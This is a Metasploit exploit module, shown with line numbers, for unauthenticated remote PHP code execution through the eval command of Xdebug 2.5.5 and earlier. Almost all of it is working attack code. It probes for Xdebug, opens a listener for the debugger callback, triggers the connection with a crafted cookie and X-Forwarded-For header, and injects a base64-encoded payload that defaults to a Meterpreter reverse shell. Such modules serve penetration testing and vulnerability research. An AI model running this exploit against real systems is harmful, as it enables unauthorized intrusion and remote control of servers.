Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::HttpClient
11
  include Rex::Proto::Http
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name' => 'xdebug Unauthenticated OS Command Execution',
16
      'Description' => %q{
17
       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
18
       This allows the attacker to execute arbitrary php code as the context of the web user.
19
      },
20
      'DisclosureDate' => '2017-09-17',
21
      'Author' => [
22
        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
23
        'Shaksham Jaiswal', # MinatoTW
24
        'Mumbai' # Austin Hudson
25
      ],
26
      'References' => [
27
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
28
        ['URL', 'https://paper.seebug.org/397/']
29
      ],
30
      'License' => MSF_LICENSE,
31
      'Platform' => 'php',
32
      'Arch' => [ARCH_PHP],
33
      'DefaultTarget' => 0,
34
      'Stance' => Msf::Exploit::Stance::Aggressive,
35
      'DefaultOptions' => {
36
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
37
      },
38
      'Payload' => {
39
        'DisableNops' => true,
40
      },
41
      'Targets' => [[ 'Automatic', {} ]],
42
    ))
43

44
    register_options([
45
        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
46
        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
47
        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
48
        Opt::RPORT(80),
49
    ])
50
  end
51

52
  def check
53
    begin
54
      res = send_request_cgi({
55
        'uri' => datastore["PATH"],
56
        'method' => 'GET',
57
          'vars_get' => {
58
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
59
       }
60
      })
61
      vprint_status "Request sent\n#{res}"
62
      if res && res.headers.to_s =~ /XDEBUG/i
63
        vprint_good("Looks like remote server has xdebug enabled\n")
64
        return CheckCode::Detected
65
      else
66
        return CheckCode::Safe
67
      end
68
      rescue Rex::ConnectionError
69
        return CheckCode::Unknown
70
    end
71
  end
72

73
  def exploit
74
    payl = Rex::Text.encode_base64("#{payload.encoded}")
75
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
76
    webserver = Thread.new do
77
    begin
78
      server = Rex::Socket::TcpServer.create(
79
        'LocalPort' => datastore['SRVPORT'],
80
        'LocalHost' => datastore['SRVHOST'],
81
        'Context' => {
82
          'Msf' => framework,
83
          'MsfExploit' => self
84
      })
85

86
      client = server.accept
87
      print_status("Waiting for client response.")
88
      data = client.recv(1024)
89
      print_status("Receiving response")
90
      vprint_line(data)
91
      print_status("Shell might take upto a minute to respond.Please be patient.")
92
      print_status("Sending payload of size #{cmd1.length} bytes")
93
      client.write(cmd1)
94
      client.close
95
      server.close
96
      webserver.exit
97
    ensure
98
      webserver.exit
99
    end
100
    end
101
    send_request_cgi({
102
        'uri' => datastore['PATH'],
103
        'method' => 'GET',
104
        'headers' => {
105
          'X-Forwarded-For' => "#{lhost}",
106
          'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
107
        }
108
    })
109
  end
110
end
111

112